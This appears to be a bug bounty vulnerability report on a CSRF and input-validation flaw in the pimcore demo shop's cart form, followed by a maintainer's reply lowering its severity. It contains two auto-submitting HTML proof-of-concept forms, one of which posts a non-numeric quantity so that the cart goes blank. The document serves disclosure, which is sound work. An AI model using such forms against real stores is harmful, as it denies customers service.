CSRF Lost cart availability to all customer in pimcore/demo
Reported on
Apr 29th 2023
Description
The absence of input validation in the update cart form Qty feature causes the feature to become an error / blank by simply changing the number to a string. In order to occur in all users the role of CSRF is required so that Severity (user interaction) is required.
So you could say these are 2 chained bugs ( csrf & improper input validation ).
Proof of Concept
1 . Normal cart
<html>
<body onload="document.forms[0].submit()">
<form id="myform" action="https://demo.pimcore.fun/en/cart" method="POST">
<input type="hidden" name="items[12]" value="1" />
</form>
</body>
</html>
- exploit for lost cart feature
<html>
<body onload="document.forms[0].submit()">
<form id="myform" action="https://demo.pimcore.fun/en/cart" method="POST">
<input type="hidden" name="items[12]" value="pwnd" />
</form>
</body>
</html>
- https://demo.pimcore.fun/en/cart will be blank
Impact
- Lost cart availability to all customer
- Customer cant order any product
References
I tested the demo account that provided the /pimcore/pimcore repo, it can be seen in the readme.md, but when I searched for the vulnerable code snippet I didn't know what was shown pointed to the /demo repo.
Hi, This is valid but the severity is too high since this issue belongs to the demo repository for educational purposes. Thanks!